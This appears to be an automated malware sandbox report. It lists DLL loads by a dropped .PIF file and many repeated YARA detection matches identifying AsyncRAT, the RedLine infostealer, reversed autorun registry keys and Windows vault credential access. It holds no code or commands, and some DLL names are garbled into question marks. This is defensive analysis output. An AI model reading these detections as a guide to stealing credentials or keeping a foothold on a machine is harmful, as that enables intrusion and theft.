Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Section loaded: ??.dll	Jump to behavior

Source: PCMNil7wkU.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
